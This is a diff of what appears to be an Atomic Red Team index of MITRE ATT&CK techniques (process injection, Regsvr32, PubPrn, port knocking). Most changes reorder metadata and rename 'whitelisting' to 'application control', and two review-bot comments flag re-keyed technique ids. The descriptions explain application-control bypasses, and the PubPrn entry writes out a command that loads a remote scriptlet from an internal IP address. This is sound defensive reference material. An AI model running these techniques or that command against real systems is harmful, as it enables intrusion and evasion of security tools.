+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ atomic_tests: []
+ T1205.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1205.001
+ url: https://attack.mitre.org/techniques/T1205/001
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
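Review bot: The Port Knocking entry is re-homed rather than updated in place: its map key changes from `T1545.001` (L90855, L90860–L90861) to `T1205.001` (L90921, L90925–L90926) while its description and cd00r references stay as context, and in the following hunk its STIX id changes as well (L90933–L90934). Anything that pins this technique by the old key, the old `attack.mitre.org/techniques/T1545/001` URL or the old `attack-pattern--90410d1b-…` id loses the link with no forwarding reference left in the file. The new `T1556.003` entry that takes the old key's slot is unrelated content (PAM) and starts with `atomic_tests: []` (L90920), which is consistent with how other test-less entries here omit `identifier`. If this is a regenerated file, the re-keying is upstream behaviour; a short line in the commit description stating that T1545.001 was superseded by T1205.001 with a new id would save the next reader from inferring it from the hunks.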
@@ -28317,7 +29202,7 @@ defense-evasion:
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -28326,22 +29211,21 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-01-22T20:26:58.120Z'
- created: '2020-01-22T20:26:58.120Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ modified: '2020-07-01T18:23:25.002Z'
+ created: '2020-07-01T18:23:25.002Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Record network packets sent to and from the system, looking
+ for extraneous packets that do not belong to established flows.
x_mitre_data_sources:
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Record network packets sent to and from the system, looking
- for extraneous packets that do not belong to established flows.
- x_mitre_defense_bypassed:
- - Defensive network service scanning
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1055.002:
technique:
@@ -28379,12 +29263,16 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:34:26.937Z'
+ modified: '2020-06-20T22:19:58.813Z'
created: '2020-01-14T01:27:31.344Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28396,14 +29284,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1542:
technique:
@@ -28434,21 +29318,11 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-23T23:50:48.319Z'
+ modified: '2020-05-19T21:22:38.174Z'
created: '2019-11-13T14:44:49.439Z'
- x_mitre_is_subtechnique: false
- x_mitre_detection: |-
- Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
-
- Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Linux
+ - Windows
x_mitre_data_sources:
- VBR
- MBR
@@ -28458,13 +29332,42 @@ defense-evasion:
- EFI
- BIOS
- API monitoring
- x_mitre_platforms:
- - Linux
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
+
+ Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1055.009:
technique:
- id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.009
+ url: https://attack.mitre.org/techniques/T1055/009
+ - url: http://hick.org/code/skape/papers/needle.txt
+ description: skape. (2003, January 19). Linux x86 run-time process manipulation.
+ Retrieved December 20, 2017.
+ source_name: Uninformed Needle
+ - source_name: GDS Linux Injection
+ url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
+ description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
+ Injection Without Ptrace(2). Retrieved February 21, 2020.
+ - source_name: DD Man
+ url: http://man7.org/linux/man-pages/man1/dd.1.html
+ description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
+ February 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
privileges. Proc memory injection is a method of executing arbitrary code
@@ -28488,36 +29391,17 @@ defense-evasion:
and possibly elevated privileges. Execution via proc memory injection may
also evade detection from security products since the execution is masked
under a legitimate process. "
- name: Proc Memory
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.009
- url: https://attack.mitre.org/techniques/T1055/009
- - url: http://hick.org/code/skape/papers/needle.txt
- description: skape. (2003, January 19). Linux x86 run-time process manipulation.
- Retrieved December 20, 2017.
- source_name: Uninformed Needle
- - source_name: GDS Linux Injection
- url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
- description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
- Injection Without Ptrace(2). Retrieved February 21, 2020.
- - source_name: DD Man
- url: http://man7.org/linux/man-pages/man1/dd.1.html
- description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
- February 21, 2020.
+ id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:33:52.548Z'
+ modified: '2020-06-20T22:25:55.331Z'
created: '2020-01-14T01:34:10.588Z'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
x_mitre_data_sources:
- Process monitoring
@@ -28531,7 +29415,6 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- - macOS
atomic_tests: []
T1055.013:
technique:
@@ -28607,29 +29490,29 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:42.921Z'
+ modified: '2020-06-20T22:27:21.304Z'
created: '2020-01-14T17:19:50.978Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: |-
Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.012:
technique:
@@ -28676,12 +29559,16 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:00:39.428Z'
+ modified: '2020-06-20T22:28:08.758Z'
created: '2020-01-14T17:21:54.470Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28694,14 +29581,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
@@ -28776,7 +29659,7 @@ defense-evasion:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -28796,23 +29679,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:43.152Z'
+ modified: '2020-06-20T22:28:45.651Z'
created: '2017-05-31T21:30:47.843Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Anastasios Pingios
- - Christiaan Beek, @ChristiaanBeek
- - Ryan Becwar
- x_mitre_data_sources:
- - API monitoring
- - File monitoring
- - DLL monitoring
- - Process monitoring
- - Named Pipes
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -28835,10 +29707,21 @@ defense-evasion:
to determine if a process is performing actions it usually does not, such
as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - API monitoring
+ - File monitoring
+ - DLL monitoring
+ - Process monitoring
+ - Named Pipes
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Christiaan Beek, @ChristiaanBeek
+ - Ryan Becwar
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -28898,7 +29781,7 @@ defense-evasion:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -28938,13 +29821,14 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:27:52.470Z'
+ modified: '2020-06-20T22:24:56.734Z'
created: '2020-01-14T01:33:19.065Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system
call should not generate large amounts of data due to their specialized nature,
and can be a very effective method to detect some of the common process injection
@@ -28953,12 +29837,10 @@ defense-evasion:
behavior to determine if a process is performing actions it usually does not,
such as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - System calls
- - Process monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1216.001:
technique:
@@ -28975,7 +29857,7 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: PubPrn
description: |-
- Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
+ Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.
id: attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58
@@ -28983,20 +29865,20 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T19:39:37.206Z'
+ modified: '2020-06-08T23:36:30.648Z'
created: '2020-02-03T16:49:57.788Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
parameters for scripts like PubPrn.vbs that may be used to proxy execution
of malicious files.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
identifier: T1216.001
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
@@ -29058,33 +29940,9 @@ defense-evasion:
phase_name: persistence
modified: '2020-03-30T13:47:29.922Z'
created: '2017-05-31T21:31:18.867Z'
- x_mitre_contributors:
- - Praetorian
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- - Office 365
- - SaaS
- - Azure AD
- x_mitre_detection: |-
- Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
-
- Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
-
- If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
-
- For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
- x_mitre_defense_bypassed:
- - Network intrusion detection system
- - Anti-virus
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '3.0'
x_mitre_data_sources:
- Office 365 account logs
- Azure activity logs
@@ -29097,9 +29955,33 @@ defense-evasion:
- File monitoring
- Authentication logs
- Binary file metadata
- x_mitre_version: '3.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_defense_bypassed:
+ - Network intrusion detection system
+ - Anti-virus
+ x_mitre_detection: |-
+ Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
+
+ Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
+
+ If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
+
+ For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ - Office 365
+ - SaaS
+ - Azure AD
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_contributors:
+ - Praetorian
atomic_tests: []
T1218.009:
technique:
@@ -29107,7 +29989,7 @@ defense-evasion:
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
- Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
+ Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
name: Regsvcs/Regasm
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -29134,29 +30016,29 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:50:56.613Z'
+ modified: '2020-06-20T22:36:37.411Z'
created: '2020-01-23T19:42:16.439Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Process whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Casey Smith
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and
Regasm.exe with prior history of known good arguments and executed binaries
to determine anomalous and potentially adversarial activity. Command arguments
used before and after Regsvcs.exe or Regasm.exe invocation may also be useful
in determining the origin and purpose of the binary being executed.
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- x_mitre_contributors:
- - Casey Smith
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.009
atomic_tests:
- name: Regasm Uninstall Method Call Test
@@ -29237,7 +30119,7 @@ defense-evasion:
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
- Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
+ Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -29268,32 +30150,32 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T15:56:13.129Z'
+ modified: '2020-06-20T22:37:32.931Z'
created: '2020-01-23T19:52:17.414Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Anti-virus
- - Process whitelisting
- x_mitre_permissions_required:
- - Administrator
- - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Casey Smith
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
x_mitre_detection: 'Use process monitoring to monitor the execution and arguments
of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history
of known good arguments and loaded files to determine anomalous and potentially
adversarial activity. Command arguments used before and after the regsvr32.exe
invocation may also be useful in determining the origin and purpose of the
script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)'
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- x_mitre_contributors:
- - Casey Smith
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Anti-virus
+ - Application control
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.010
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
@@ -29434,15 +30316,8 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-02-10T20:03:11.691Z'
created: '2020-02-10T20:03:11.691Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'If file names are mismatched between the file name on disk
and that of the binary''s PE metadata, this is a likely indicator that a binary
was renamed after it was compiled. Collecting and comparing disk and resource
@@ -29453,8 +30328,15 @@ defense-evasion:
the command-line arguments that are known to be used and are distinct because
it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading
Update)'
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Binary file metadata
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1036.003
atomic_tests:
- name: Masquerading as Windows LSASS process
@@ -29667,21 +30549,12 @@ defense-evasion:
del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
name: command_prompt
- T1536:
+ T1578.004:
technique:
- id: attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c
- description: |-
- An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
-
- Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)
- name: Revert Cloud Instance
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- - external_id: T1536
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1536
+ - source_name: mitre-attack
+ external_id: T1578.004
+ url: https://attack.mitre.org/techniques/T1578/004
- source_name: Tech Republic - Restore AWS Snapshots
url: https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/
description: Hardiman, N.. (2012, March 20). Backing up and restoring snapshots
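Review bot: The index key `T1536` is removed and `T1578.004` added under a new STIX id (`attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1`), with nothing in the entry recording that the new sub-technique supersedes the old one. Any atomic-test metadata, detection mapping or report that still references `T1536` now resolves to nothing rather than to `T1578.004`, and the new entry's `created` timestamp (visible in the following hunk) restarts history in June 2020, so the 2019 lineage disappears from the index. If the generator cannot emit a forwarding entry under the old key, the supersession should at least be stated in the commit message, e.g. `T1536 (Revert Cloud Instance) replaced by sub-technique T1578.004 per upstream ATT&CK; update any references to the old id.` The technique entry continues past the end of this hunk.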
@@ -29690,15 +30563,25 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Revert Cloud Instance
+ description: |-
+ An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
+
+ Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)
+ id: attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T19:32:04.592Z'
- created: '2019-09-04T14:37:07.959Z'
+ modified: '2020-06-17T17:36:24.531Z'
+ created: '2020-06-16T18:42:20.734Z'
+ x_mitre_version: '1.0'
